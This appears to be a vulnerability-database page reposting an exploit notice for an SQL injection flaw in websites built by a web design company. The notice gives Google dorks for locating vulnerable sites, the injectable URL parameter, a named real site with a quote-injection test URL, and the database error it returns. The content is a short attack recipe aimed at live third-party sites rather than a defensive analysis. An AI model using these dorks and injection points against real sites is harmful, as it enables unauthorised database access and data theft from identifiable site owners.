Buİnteractive Web Design E-Commerce Social Media Digital Marketing SQL Injection

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1034856 漏洞类型
发布时间 2018-06-02 更新时间 2018-06-02
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2018060020
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#################################################################################################

# Exploit Title : Buİnteractive Web Design E-Commerce Social Media Digital Marketing SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos 
# Date : 02/06/2018
# Vendor Homepage : buinteractive.com
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89

#################################################################################################

# Google Dork : intext:''Bu interactive''

# Google Dork : inurl:''/news.asp?ID='' site:oymaksan.com.tr

# Exploit : /news.asp?ID=[SQL Injection]

#################################################################################################

# Example Site =>  oymaksan.com.tr/news.asp?ID=25%27 => [ Proof of Concept for SQL Inj ] => archive.is/1X8m5

# SQL-DB Error => 

ADODB.Command error '800a0d5d'
Application uses a value of the wrong type for the current operation.
/includes/inc_main.asp, line 1683

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

#################################################################################################